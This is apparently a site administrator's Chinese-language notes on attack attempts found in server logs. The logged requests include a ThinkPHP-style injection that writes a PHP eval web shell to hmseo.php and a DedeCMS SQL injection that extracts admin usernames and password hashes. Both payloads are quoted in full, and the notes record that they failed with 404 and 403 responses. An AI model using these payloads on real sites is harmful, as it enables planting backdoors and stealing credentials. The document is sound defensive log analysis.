////原链接 https://www.****.org/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27hmseo.php%27,%27%3C?php%20@eval($_POST[hm]);?%3Ehmseo%27)%3C/php%3E%22%20%22Mozilla/4.0%20(compatible;%20MSIE%209.0;%20Windows%20NT%206.1) ///解析之后的链接 https://www.****.org/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php @eval($_POST[hm]);?>hmseo')</php>" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
在进行get访问之后,黑客使用get,来进行访问 hmseo.php
发现请求失败,GET /hmseo.php HTTP/1.1" 404 573
后面使用下面的方法进行请求
https://www.****.org/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=x5C%27%20or%20mid=@`x5C%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`x5C%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
后被拦截回显403
估计方法失败,然后使用工具进行大量POST请求
在POST将近100次之后,全是404, 随后放弃